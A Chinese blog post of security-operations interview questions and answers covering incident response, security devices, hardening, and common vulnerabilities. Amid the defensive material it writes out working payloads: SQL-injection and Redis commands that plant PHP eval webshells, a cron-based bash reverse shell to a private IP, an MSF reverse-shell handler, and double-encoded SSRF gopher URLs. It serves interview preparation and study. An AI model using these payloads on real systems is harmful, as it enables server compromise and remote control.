一. 設(shè)備誤報如何處理？

答：

來自外網(wǎng)的誤報說明安全設(shè)備需要進行策略升級，不需要處置。

如果是來自內(nèi)網(wǎng)的誤報可以和負責(zé)人協(xié)商一下看能不能解決，有必要的話添加白名單處理。

二. 如何區(qū)分掃描流量和手工流量？

答：

1.掃描流量數(shù)據(jù)量大，請求流量有規(guī)律可循且頻率較高，手工流量請求少，間隔略長

2.使用工具掃描的流量一般在數(shù)據(jù)包中有相關(guān)特征信息，比如說通過wireshark網(wǎng)絡(luò)封包分析工具對流量進行一個具體的排查分析，比如通過http contains "xxx"來查找數(shù)據(jù)包中的關(guān)鍵字。

比如常用的漏洞掃描工具AWVS，Nessus以及APPscan在請求的URL，Headers, Body三項里隨機包含了能代表自己的特征信息。

三. 網(wǎng)站被上傳webshell如何處理？

答：

1.首先關(guān)閉網(wǎng)站，下線服務(wù)。有必要的話將服務(wù)器斷網(wǎng)隔離。

2.手工結(jié)合工具進行檢測。

工具方面比如使用D盾webshellkill，河馬webshell查殺，百度在線webshell查殺等工具對網(wǎng)站目錄進行排查查殺，如果是在護網(wǎng)期間可以將樣本備份再進行查殺。

手工方面對比未上傳webshell前的備份文件，從文件甚至代碼層面進行對比，檢查有無后門程序或者其他異常文件，實在不行就直接用備份文件替換了。

4.加強安全策略，比如定期備份網(wǎng)站配置文件，及時安裝服務(wù)器補丁，定期更新組件以及安全防護軟件，定期修改密碼等等措施。

四. 給你一個比較大的日志，應(yīng)該如何分析？

答：

攻擊規(guī)則匹配通過正則匹配日志中的攻擊請求

統(tǒng)計方法，統(tǒng)計請求出現(xiàn)次數(shù)，次數(shù)少于同類請求平均次數(shù)則為異常請求

白名單模式，為正常請求建立白名單，不在名單范圍內(nèi)則為異常請求

HMM 模型，類似于白名單，不同點在于可對正常請求自動化建立模型，從而通過正常模型找出不匹配者則為異常請求

使用日志分析工具，如LogForensics，Graylog，Nagios，ELK Stack等等

五. 常見OA系統(tǒng)？

答：

PHP：通達OA、泛微 Eoffice

Java：泛微OA/云橋、致遠OA、藍凌OA、用友OA

ASP：啟萊OA

六. 了解安全設(shè)備嗎？

答：

入侵防御系統(tǒng)IPS

是計算機網(wǎng)絡(luò)安全設(shè)施，是對防病毒軟件和防火墻的補充。入侵預(yù)防系統(tǒng)是一部能夠監(jiān)視網(wǎng)絡(luò)或網(wǎng)絡(luò)設(shè)備的網(wǎng)絡(luò)數(shù)據(jù)傳輸行為的計算機網(wǎng)絡(luò)安全設(shè)備，能夠即時的中斷、調(diào)整或隔離一些不正?；蚴蔷哂袀π缘木W(wǎng)絡(luò)數(shù)據(jù)傳輸行為。

入侵檢測系統(tǒng)IDS

積極主動的防護措施，按照一定的安全策略，通過軟件，硬件對網(wǎng)絡(luò)，系統(tǒng)的運行進行實時的監(jiān)控，盡可能地發(fā)現(xiàn)網(wǎng)絡(luò)攻擊行為，積極主動的處理攻擊，保證網(wǎng)絡(luò)資源的機密性，完整性和可用性。

防火墻

防火墻是位于兩個(或多個)網(wǎng)絡(luò)間，實行網(wǎng)絡(luò)間訪問或控制的一組組件集合之硬件或軟件。隔離網(wǎng)絡(luò)，制定出不同區(qū)域之間的訪問控制策略來控制不同信任程度區(qū)域間傳送的數(shù)據(jù)流。

數(shù)據(jù)庫審計系統(tǒng)

是對數(shù)據(jù)庫訪問行為進行監(jiān)管的系統(tǒng)，通過鏡像或者探針的方式采集所有數(shù)據(jù)庫的訪問流量，并基于SQL語法，語義的解析技術(shù)，記錄下對數(shù)據(jù)庫所有訪問和操作行為，例如訪問數(shù)據(jù)的用戶IP，賬號，時間等等，對數(shù)據(jù)進行操作的行為等等。

日志審計系統(tǒng)

日志審計系統(tǒng)能夠通過主被動結(jié)合的手段，實時且不間斷的采集用戶網(wǎng)絡(luò)中不同廠商的安全設(shè)備，網(wǎng)絡(luò)設(shè)備，主機，操作系統(tǒng)以及各種應(yīng)用系統(tǒng)產(chǎn)生的海量日志信息，并將這些信息匯集到審計中心，進行集中化存儲，備份，查詢，審計，告警，響應(yīng)，并出具豐富的報表報告，獲悉全網(wǎng)的整體安全運行態(tài)勢，同時滿足等保關(guān)于安全管理中心的日志保存時間大于6個月的要求。

堡壘機

是針對內(nèi)部運維人員的運維安全審計系統(tǒng)。主要功能是對運維人員的運維操作進行審計和權(quán)限控制(比如要登錄某些平臺或者系統(tǒng)只能通過堡壘機才可以，不用堡壘機是無法訪問的)。同時堡壘機還有賬號集中管理，單點登錄(在堡壘機上登錄即可實現(xiàn)對多個其他平臺的無密登錄)等功能。

漏洞掃描系統(tǒng)

漏洞掃描工具或者設(shè)備是基于漏洞數(shù)據(jù)庫，通過掃描等手段對指定的遠程或本地計算機系統(tǒng)的安全脆弱性進行檢測，發(fā)現(xiàn)可利用漏洞的一種安全檢測系統(tǒng)(我們常用的針對WEB站點進行掃描的工具和此處漏洞掃描系統(tǒng)不是一個概念)。

數(shù)據(jù)安全態(tài)勢感知平臺

以大數(shù)據(jù)平臺為基礎(chǔ)，通過收集多元，異構(gòu)的海量日志，利用關(guān)聯(lián)分析，機器學(xué)習(xí)，威脅情報，可視化等技術(shù)，幫助用戶持續(xù)監(jiān)測網(wǎng)絡(luò)安全態(tài)勢，實現(xiàn)從被動防御向積極防御的進階。

終端安全管理系統(tǒng)

是集防病毒，終端安全管控，終端準入，終端審計，外設(shè)管控，EDR等功能于一體，兼容不同操作系統(tǒng)和計算機平臺，幫助客戶實現(xiàn)平臺一體化，功能一體化，數(shù)據(jù)一體化的終端安全立體防護。

WAF

WAF是以網(wǎng)站或應(yīng)用系統(tǒng)為核心的安全產(chǎn)品，通過對HTTP或HTTPS的Web攻擊行為進行分析并攔截，有效的降低網(wǎng)站安全風(fēng)險。產(chǎn)品主要部署在網(wǎng)站服務(wù)器的前方。通過特征提取和分塊檢索技術(shù)進行模式匹配來達到過濾，分析，校驗網(wǎng)絡(luò)請求包的目的，在保證正常網(wǎng)絡(luò)應(yīng)用功能的同時，隔絕或者阻斷無效或者非法的攻擊請求。

蜜罐

蜜罐是一種安全威脅的主動防御技術(shù)，它通過模擬一個或多個易受攻擊的主機或服務(wù)來吸引攻擊者，捕獲攻擊流量與樣本，發(fā)現(xiàn)網(wǎng)絡(luò)威脅，提取威脅特征，蜜罐的價值在于被探測，攻陷。

七. 了解過系統(tǒng)加固嗎？

答：

賬戶安全

windows

比如設(shè)置登錄時不顯示上次登錄的用戶名，防止弱口令爆破。

設(shè)置賬戶鎖定策略，比如說登錄行為限制次數(shù)，達到次數(shù)后鎖定多長時間。

linux

禁用root之外的超級用戶 使用password -l <用戶名>命令來鎖定用戶 -u解鎖

限制普通用戶使用sudo提權(quán)，或者說限制提權(quán)的權(quán)限大小

鎖定系統(tǒng)中多余的自建賬號

設(shè)置賬戶鎖定登錄失敗鎖定次數(shù)，鎖定時間 faillog -u <用戶名>命令來解鎖用戶

口令安全

windows

設(shè)置密碼必須符合復(fù)雜性要求，比如設(shè)置時數(shù)字，大寫字母，小寫字母，特殊字符都要具備

設(shè)置最小密碼長度不能為0，設(shè)置不能使用歷史密碼

linux

檢查shadow中空口令賬號，修改口令復(fù)雜度，設(shè)置密碼有效期vim /etc/login.def命令

服務(wù)與端口收斂

關(guān)閉或者限制常見的高危端口，比如說22端口(SSH)，23端口(Telnet)，3389端口(RDP)

compmgmt.msc排查計劃任務(wù)

linux上iptables封禁IP或者限制端口

文件權(quán)限管理

linux上chmod修改文件權(quán)限 chattr重要文件設(shè)置不可修改權(quán)限

系統(tǒng)日志審計

linux上設(shè)置系統(tǒng)日志策略配置文件

系統(tǒng)日志 /var/log/message

cron日志/var/log/cron

安全日志/var/log/secure

設(shè)備和網(wǎng)絡(luò)控制

比如在涉密計算機上禁止訪問外網(wǎng)，為了避免用戶繞過策略可以禁止用戶修改IP

刪除默認路由配置，避免利用默認路由探測網(wǎng)絡(luò)

禁止使用USB設(shè)備比如U盤

禁止ping命令，即禁用ICMP協(xié)議訪問，不讓外部ping通服務(wù)器

八. 有沒有安全設(shè)備的使用經(jīng)驗？

答：

態(tài)勢感知或者說安全運營方面開源項目OSSIM。

IPS(入侵防御系統(tǒng))方面Snort和安全洋蔥Security Onion。

防火墻方面TinyWall和ClearOS，或者說像火絨，騰訊安全管家等一些常規(guī)的防護軟件。

WAF（Web應(yīng)用防火墻 ）方面ModSecurity和網(wǎng)站安全狗以及寶塔。

威脅情報方面MISP和OpenCTI。

漏洞掃描方面OpenVAS，針對web站點的漏洞掃描工具使用過AWVS，Nessus

堡壘機方面JumpServer(linux系統(tǒng)安裝，但可以添加windows主機作為資產(chǎn))。

蜜罐方面T-Pot(基于Linux系統(tǒng)安裝)和微步的Hfish。

九. CS是什么東西，知道怎么使用嗎？

答：

簡介

CobaltStrike是一款滲透測試工具，被業(yè)界人稱為CS。CobaltStrike分為客戶端與服務(wù)端，服務(wù)端是一個，客戶端可以有多個，可用于團隊分布式協(xié)同操作。

功能

CobaltStrike 集成了端口轉(zhuǎn)發(fā)，服務(wù)掃描，自動化溢出，多模式端口監(jiān)聽，windows exe 木 馬生成，windows dll 木馬生成，java 木馬生成，office 宏病毒生成，木馬捆綁。釣魚攻擊等功能。

使用

一般使用步驟就是，先啟動服務(wù)端，然后啟動客戶端連接獲得一個可視化的界面，新建監(jiān)聽器來接收會話，生成木馬文件(常見.exe可執(zhí)行文件，office宏病毒，html應(yīng)用程序類型的后門文件)，上傳到受害者主機，當(dāng)受害者運行該木馬文件時目標主機就在CS上線了。

十. WAF方面有沒有了解過，清楚WAF的分類和原理嗎？

答：

分類：

WAF分為非嵌入型WAF和嵌入型WAF，非嵌入型指的是硬WAF、云WAF、虛擬機WAF之類的；嵌入型指的是web容器模塊類型WAF、代碼層WAF。

原理：

Web應(yīng)用防火墻是通過執(zhí)行一系列針對HTTP或者HTTPS的安全策略來專門為Web應(yīng)用提供保護的一款產(chǎn)品。WAF對請求的內(nèi)容進行規(guī)則匹配、行為分析等識別出惡意行為，并執(zhí)行相關(guān)動作，這些動作包括阻斷、記錄、告警等。

十一. Powershell了解過嗎？

答：

簡介

PowerShell 是一種命令行外殼程序和腳本環(huán)境，主要用于Windows計算機方便管理員進行系統(tǒng)管理并有可能在未來取代Windows上的默認命令提示符。PowerShell腳本因其良好的功能特性常用于正常的系統(tǒng)管理和安全配置工作。

使用

常見的操作 pwd ls cd mkdir rm

get-process獲取所有進程信息

get-date獲取當(dāng)前時間信息

get-host獲取當(dāng)前主機信息

然后就是使用PowersSploit(基于Powershell的后滲透框架軟件，包括了很多Power shell攻擊腳本，主要用于滲透中的信息收集，權(quán)限提升，權(quán)限維持)的時候在Powshell上使用過一些下載和運行攻擊腳本的命令。

十二. MSF是什么？知道怎么使用嗎？

答：

簡介：

Metasploit Framework(MSF)是一款開源安全漏洞檢測工具，附帶數(shù)千個已知的軟件漏洞，并保持持續(xù)更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程。

模塊：

Auxiliary（輔助模塊）

為滲透測試信息搜集提供了大量的輔助模塊支持

Exploits（攻擊模塊）

利用發(fā)現(xiàn)的安全漏洞或配置弱點對遠程目標系統(tǒng) 進行攻擊，從而獲得對遠程目標系統(tǒng)訪問權(quán)的代碼組件。

Payload（攻擊載荷模塊）

攻擊成功后促使靶機運行的一段植入代碼

Post （后滲透攻擊模塊）

收集更多信息或進一步訪問被利用的目標系統(tǒng)

Encoders（編碼模塊）

將攻擊載荷進行編碼，來繞過防護軟件攔截

使用：

首先利用Auxiliary輔助探測模塊掃描，嗅探，指紋識別相關(guān)漏洞，然后確認漏洞存在使用Exploit漏洞利用模塊對漏洞進行利用，包括設(shè)置payload攻擊載荷，設(shè)置本機監(jiān)聽等等。漏洞利用成功目標主機就會通過設(shè)置的端口主動連接，產(chǎn)生會話。進而可以進行后滲透。

功能：

木馬免殺，抓取用戶密碼，關(guān)閉殺毒軟件，屏幕截圖，新建賬號，遠程登錄，遷移進程，提權(quán)操作，網(wǎng)絡(luò)嗅探，端口轉(zhuǎn)發(fā) ，內(nèi)網(wǎng)代理，內(nèi)網(wǎng)掃描，生成后門，清除日志等等。

十三. 使用過什么XSS平臺嗎？

答：

1.清華藍蓮花戰(zhàn)隊的BlueLotus。

2.xss-platform平臺。

2.kali中的beef平臺。

3.利用工具Postman。

十四. SQL注入怎么寫入webshell？

答：

條件：

1、知道web絕對路徑

2、有文件寫入權(quán)限(一般情況只有ROOT用戶有)

3、數(shù)據(jù)庫開啟了secure_file_priv設(shè)置

然后就能用select into outfile寫入webshell

常見手法：

聯(lián)合注入寫入

?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into outfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#

dumpfile函數(shù)寫入

?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into dumpfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#

lines terminated by 寫入

?id=1 into outfile 'C:/wamp64/www/shell.php' lines terminated by '<?php phpinfo()?>';

//lines terminated by 可以理解為 以每行終止的位置添加 xx 內(nèi)容。

lines starting by 寫入

?id=1 into outfile 'C:/wamp64/www/shell.php' lines starting by '<?php phpinfo()?>';//利用 lines starting by 語句拼接webshell的內(nèi)容。lines starting by 可以理解為 以每行開始的位置添加 xx 內(nèi)容。

fields terminated by 寫入

?id=1 into outfile 'C:/wamp64/www/work/shell.php' fields terminated by '<?php phpinfo() ?>';//利用 fields terminated by 語句拼接webshell的內(nèi)容。fields terminated by 可以理解為 以每個字段的位置添加 xx 內(nèi)容。

columns terminated by 寫入

?id=1 into outfile 'C:/wamp64/www/shell.php' COLUMNS terminated by '<?php phpinfo() ?>';//利用 fields terminated by 語句拼接webshell的內(nèi)容。fields terminated by 可以理解為 以每個字段的位置添加 xx 內(nèi)容。

sqlmap寫入

寫：(要寫的文件，必須在kali本機里有)寫入到 /tmp 目錄下 sqlmap -u "http://127.0.0.1/index.php?page=user-info.php&username=a%27f%27v&password=afv&user-info-php-submit-button=View+Account+Details" -p 'username' --file-write="shell.php" --file-dest="/tmp/shell.php"

十五. 了解過反序列化漏洞嗎？

答：

原理：

序列化是指程序?qū)ο筠D(zhuǎn)化為字節(jié)序列從而便于存儲運輸?shù)囊环N方式，反序列化則與其相反，即將字節(jié)序列轉(zhuǎn)化為對象供程序使用。程序在進行反序列化時會調(diào)用一些函數(shù)，比如常見的PHP反序列化函數(shù)unserialize()以及一些常見的魔術(shù)方法，比如構(gòu)造函數(shù)_construct()，析構(gòu)函數(shù)_destruct()，_wakeup()，_toString()，_sleep()等等。如果這些函數(shù)在傳遞參數(shù)時沒有進行嚴格的過濾措施，那么攻擊者就可以構(gòu)造惡意代碼并將其序列化后傳入函數(shù)中，從而導(dǎo)致反序列化漏洞。

Java反序列化

Java反序列化就是將java對象轉(zhuǎn)化為字節(jié)序列的過程。反序列化的過程就是

1，創(chuàng)建一個對象輸出流

2，通過對象輸出流的ReadObject()方法來讀取對象

十六. 常見的框架漏洞？

答：

log4j遠程代碼執(zhí)行漏洞

原理：

Log4j 是Apache 的一個開源項目，是一款基于Java 的開源日志記錄工具。該漏洞主要是由于日志在打印時當(dāng)遇到`${`后，以:號作為分割，將表達式內(nèi)容分割成兩部分，前面一部分prefix，后面部分作為key，然后通過prefix去找對應(yīng)的lookup，通過對應(yīng)的lookup實例調(diào)用lookup方法，最后將key作為參數(shù)帶入執(zhí)行，引發(fā)遠程代碼執(zhí)行漏洞。

具體操作：

在正常的log處理過程中對**${**這兩個緊鄰的字符做了檢測，一旦匹配到類似于表達式結(jié)構(gòu)的字符串就會觸發(fā)替換機制，將表達式的內(nèi)容替換為表達式解析后的內(nèi)容，而不是表達式本身，從而導(dǎo)致攻擊者構(gòu)造符合要求的表達式供系統(tǒng)執(zhí)行

Fastjson反序列化漏洞

判斷：

正常請求是get請求并且沒有請求體，可以通過構(gòu)造錯誤的POST請求，即可查看在返回包中是否有fastjson這個字符串來判斷。

原理：

fastjson是阿里巴巴開發(fā)的一款將json字符串和java對象進行序列化和反序列化的開源json解析庫。fastjson提供了autotype功能，在請求過程中，我們可以在請求包中通過修改@type的值，來反序列化為指定的類型，而fastjson在反序列化過程中會設(shè)置和獲取類中的屬性，如果類中存在惡意方法，就會導(dǎo)致代碼執(zhí)行等這類問題。

無回顯怎么辦：

1.一種是直接將命令執(zhí)行結(jié)果寫入到靜態(tài)資源文件里，如html、js等，然后通過http訪問就可以直接看到結(jié)果

2.通過dnslog進行數(shù)據(jù)外帶，但如果無法執(zhí)行dns請求就無法驗證了

3.直接將命令執(zhí)行結(jié)果回顯到請求Poc的HTTP響應(yīng)中

Shiro反序列化漏洞

原理：

Shiro是Apache下的一個開源Java安全框架，執(zhí)行身份認證，授權(quán)，密碼和會話管理。shiro在用戶登錄時除了賬號密碼外還提供了可傳遞選項remember me。用戶在登錄時如果勾選了remember me選項，那么在下一次登錄時瀏覽器會攜帶cookie中的remember me字段發(fā)起請求，就不需要重新輸入用戶名和密碼。

判斷：

1.數(shù)據(jù)返回包中包含rememberMe=deleteMe字段。

2.直接發(fā)送原數(shù)據(jù)包，返回的數(shù)據(jù)中不存在關(guān)鍵字可以通過在發(fā)送數(shù)據(jù)包的cookie中增加字段：****rememberMe=然后查看返回數(shù)據(jù)包中是否存在關(guān)鍵字。

shiro-550：

shiro反序列化漏洞利用有兩個關(guān)鍵點，首先是在shiro<1.2.4時，AES加密的密鑰Key被硬編碼在代碼里，只要能獲取到這個key就可以構(gòu)造惡意數(shù)據(jù)讓shiro識別為正常數(shù)據(jù)。另外就是shiro在驗證rememberMe時使用了readObject方法，readObject用來執(zhí)行反序列化后需要執(zhí)行的代碼片段，從而造成惡意命令可以被執(zhí)行。攻擊者構(gòu)造惡意代碼，并且序列化，AES加密，base64編碼后，作為cookie的rememberMe字段發(fā)送。Shiro將rememberMe進行編碼，解密并且反序列化，最終造成反序列化漏洞。

shiro-721：

不需要key，利用Padding Oracle Attack構(gòu)造出RememberMe字段后段的值結(jié)合合法的Remember。

十七.了解過redis數(shù)據(jù)庫和常見的漏洞嗎？

答：

redis是一個非關(guān)系型數(shù)據(jù)庫，使用的默認端口是6379。常見的漏洞是未授權(quán)訪問漏洞，攻擊者無需認證就可以訪問內(nèi)部數(shù)據(jù)。利用手段主要有：

1.向root權(quán)限賬戶寫入ssh公鑰文件，直接免密登錄服務(wù)器。(受害者redis非root權(quán)限運行會報錯)

條件：

服務(wù)器存在.ssh目錄且具有寫入的權(quán)限

原理：

在數(shù)據(jù)庫中插入一條數(shù)據(jù)，將本機的公鑰作為value，key值隨意，然后通過修改數(shù)據(jù)庫的默認路徑為/root/.ssh和默認的緩沖文件authorized.keys，把緩沖的數(shù)據(jù)保存在文件里，這樣就可以在服務(wù)器端的/root/.ssh下生成一個授權(quán)的key。

2.寫入webshell

條件：

已知web絕對路徑。

步驟：

1. redis -cli -h 192.168.x.x 連接目標服務(wù)器

2. config set dir "/var/www/html" 設(shè)置保存文件路徑

3. config set dbfilename shell.php 設(shè)置保存文件名

4. set x "\n\n<?php @eval($_POST['cmd']); ?>\n" 將webshell寫入x鍵值中

5. save 保存

局限：

1.服務(wù)器處于內(nèi)網(wǎng)，寫入webshell后我們的公網(wǎng)IP無法連接

2.服務(wù)器IP地址不固定

3.6379端口不允許入方向

4.上傳webshell可能直接被殺毒軟件刪除

3.反彈連接shell

設(shè)置監(jiān)聽端口，常用的工具1.msf 2.netcat 3.socat利用msf設(shè)置監(jiān)聽步驟：1. use exploit/multi/handler2. set payload generic/shell_reverse_tcp3. set lhost 192.168.x.x 默認監(jiān)聽端口為44444. run

4.定時任務(wù)反彈shell

步驟：定時任務(wù)用的表達式 ：Cron表達式是一個字符串，該字符串由6個空格分為7個域，每一個域代表一個時間含義。分 時 天 月 周 user-name(用戶) command(命令) 比如每過一分鐘向root用戶的定時任務(wù)中寫入反彈連接命令(1) config set dir /var/spool/cron/ //目錄切換到定時任務(wù)的文件夾中(2) config set dbfilename root //設(shè)置保存文件名(3)set x "\n * * * * * bash -i >& /dev/tcp/192.168.96.222/7777 0>&1\n" //將反彈shell寫入x鍵值中(4)save //保存

利用定時任務(wù)反彈shell在目標系統(tǒng)是Centos上可用，Ubuntu上有限制

理由如下：

1.默認redis寫文件后是644的權(quán)限，但ubuntu要求執(zhí)行定時任務(wù)件/var/spool/cron/crontabs/權(quán)限必須是600也就是-rw-------才會執(zhí)行，否則會報錯，而Centos的定時任務(wù)文件權(quán)限644也能執(zhí)行2.redis保存RDB會存在亂碼，在Ubuntu上會報錯，而在Centos上不會報錯3.兩個系統(tǒng)的定時任務(wù)文件目錄不同

利用主從復(fù)制getshell

條件：版本(4.x~5.0.5)原理：數(shù)據(jù)讀寫體量很大時，為了減輕服務(wù)器的壓力，redis提供了主從模式，主從模式就是指定一個redis實例作為主機，其余的作為從機，其中主機和從機的數(shù)據(jù)是相同的，而從機只負責(zé)讀，主機只負責(zé)寫。通過讀寫分離可以減輕服務(wù)器端的壓力。利用工具：RedisRogueServer地址：https://github.com/n0b0dyCN/redis-rogue-server使用工具的命令：python3 redis-rogue-server.py --rhost=x.x.x.x --lhost=x.x.x.x --exp=exp.so兩種使用方法：交互式反彈式限制：利用這個方法getshell或者rce任意導(dǎo)致redis服務(wù)癱瘓，一般不建議使用

redis未授權(quán)訪問漏洞的防范措施：

1.添加登錄密碼

2.修改默認端口

3.關(guān)閉端口

4.禁止以root用戶權(quán)限啟動，以低權(quán)限啟動redis服務(wù)

十八. SSRF怎么結(jié)合Redis相關(guān)漏洞利用？

答：

主要通過兩種協(xié)議，dict協(xié)議和gopher協(xié)議。

dict協(xié)議利用redis相關(guān)漏洞：

探測端口：

ssrf.php?url=dict://x.x.x.x:$端口$ 利用burpsuite爆破端口

探測是否設(shè)置弱口令：

ssrf.php?url=dict://x.x.x.x:6379/info 已知端口利用info探測是否設(shè)置了密碼

爆破密碼：

ssrf.php?url=dict://x.x.x.x:6379/auth:$密碼$ 利用burpsuite爆破密碼

寫入webshell：

1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html 切換文件目錄2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php 設(shè)置保存文件名3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e" //利用dict協(xié)議寫入webshell 以上的字符編碼是<?php phpinfo();?>的十六進制4. url=dict://x.x.x.x:6379/save 保存

1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html 切換文件目錄

2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php 設(shè)置保存文件名

3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"

//利用dict協(xié)議寫入webshell 以上的字符編碼是<?php phpinfo();?>的十六進制

4.ssrf.php?url=dict://x.x.x.x:6379/save 保存

dict協(xié)議利用計劃任務(wù)反彈shell或者寫入ssh公鑰的手段類似

gopher協(xié)議利用redis未授權(quán)訪問漏洞寫入webshell：

常規(guī)利用步驟：

set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n"

config set dir /var/www/html

config set dbfilename shell.php

save

兩次url編碼后構(gòu)造url：

http://192.168.1.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

//第一次url解碼和第二次url解碼

//同理其他類似計劃任務(wù)反彈和寫入ssh公鑰等getshell方式相似

十九. windows應(yīng)急響應(yīng)時排查分析的相關(guān)細節(jié)？

答：

可疑賬號排查 lusrmgr.msc

1.檢查服務(wù)器是否有弱口令。比如空口令或者密碼復(fù)雜度不夠。

2.高危端口是否對外開放，比如SSH服務(wù)22端口，RDP服務(wù)3389端口等。

3.查看服務(wù)器是否有可疑賬號。

手工方面：lusrmgr.msc命令查看用戶和組，查看是否有新增賬號，隱藏賬號，克隆賬號。

工具方面：比如利用D盾等工具來檢測隱藏賬號。

4.結(jié)合日志分析 eventvwr.msc 查看管理員登錄時間，相關(guān)事件是否有異常。

敏感事件ID：

4624 登錄成功

4625 登錄失敗

4672 使用超級管理員進行登錄

4720 創(chuàng)建用戶

5.使用query user查看當(dāng)前系統(tǒng)的會話，比如查看是否有人使用遠程登錄服務(wù)器。

可疑進程和服務(wù)排查 taskmgr services.msc

1.查看CPU，內(nèi)存，網(wǎng)絡(luò)等資源是否有可疑狀況。比如CPU占用率過高可能是中了挖礦病毒，磁盤空間大量占用可能是腳本或病毒大量生成和復(fù)制隱藏文件。

2.檢查進程名

某些進程名是大量隨機的情況，比如hrlC3.tmp、hrlD5.tmp、hrl6.tmp、hrlEE.tmp等多個名字相似的進程，基本上可以斷定是異常進程。

異常進程名偽裝成系統(tǒng)進程或者說常見服務(wù)的進程名，此時可以通過進程描述來判斷，并且需要手工對比。

3.檢查進程和服務(wù)描述，修改時間或者數(shù)字簽名是否有異常。

4.利用工具進行檢測，比如Process Hunter或者火絨劍等專門針對進程服務(wù)信息的排查分析工具，主要查看的是公司名，描述，安全狀態(tài)和啟動類型等方面來排查。

可疑啟動項排查 msconfig

1. msconfig或者任務(wù)管理器中的啟動項查看名稱，發(fā)布者和啟動影響，以及右鍵查看屬性來看數(shù)字簽名和修改時間。

2. 結(jié)合工具進行排查，比如火絨劍等工具，會將啟動項分類為登錄，驅(qū)動程序，計劃任務(wù)，映像劫持等，利用分析排查

可疑文件排查

1.各個磁盤的Temp/tmp目錄中是Windows產(chǎn)生的臨時文件，查看有無異常文件。

2.Recent目錄會記錄最近打開的文檔以及程序的相關(guān)記錄。

3.查看文件的創(chuàng)建時間，修改時間和訪問時間，比如說攻擊者利用菜刀等工具對文件進行修改會改變修改時間，如果修改時間在創(chuàng)建時間之前，那就是很明顯的可疑文件。

4.windows系統(tǒng)我的電腦快速訪問，可以看到最近使用的文件，比如說圖片或者壓縮包等文件的使用歷史和文件路徑都會顯示。

惡意樣本排查

1.惡意樣本指的一般是webshell，病毒，木馬或者后門程序或文件，可以根據(jù)設(shè)備的告警信息來查找相關(guān)路徑，再排查相關(guān)的進程和啟動項。

2.不知道路徑的話可以利用相關(guān)的安全設(shè)備來進行檢測，比如說通過D盾，河馬查殺等工具對webshell可能存在的目錄進行一個排查查殺，利用常規(guī)的防火墻軟件來對全盤或者可疑目錄掃描病毒。

二十. 常見的webshell連接工具流量？

答：

中國菜刀

連接過程中使用base64編碼對發(fā)送的指令進行加密，其中兩個關(guān)鍵payload z1 和 z2，名字都是可變的。

然后還有一段以QG開頭，7J結(jié)尾的固定代碼。

蟻劍

默認的user-agent請求頭是antsword xxx，不過可以修改。

一般將payload進行分段，然后分別進行base64編碼，一般具有像eval這樣的關(guān)鍵字，然后呢大概率還有@ini_set("display","0");這段代碼。

冰蝎

php代碼中可能存在eval，assert等關(guān)鍵詞，jsp代碼中可能會有g(shù)etclass()，getclassLoader()等字符特征。

冰蝎2.0

第一階段請求中返回包的狀態(tài)碼是200，返回內(nèi)容是16位的密鑰。建立連接后的cookie格式都是Cookie：PHPSessid=xxxx ；path=/；特征。

冰蝎3.0

請求包中的conten-length字段是5740或者5720，然后請求頭也具有特征信息，不過這個比較長，沒有記住。

哥斯拉

1.jsp代碼中可能會具有g(shù)etclass，getclassLoader等關(guān)鍵字，payload使用base64編碼等特征。php和asp則是普通的一句話木馬。

2.在響應(yīng)包的cache-control字段中有no-store，no-cache等特征。

3.所有請求中的cookie字段最后面都存在；特征

————————————————

作者：熱愛畫家夫人

原文鏈接：https://blog.csdn.net/zlloveyouforever/article/details/125174473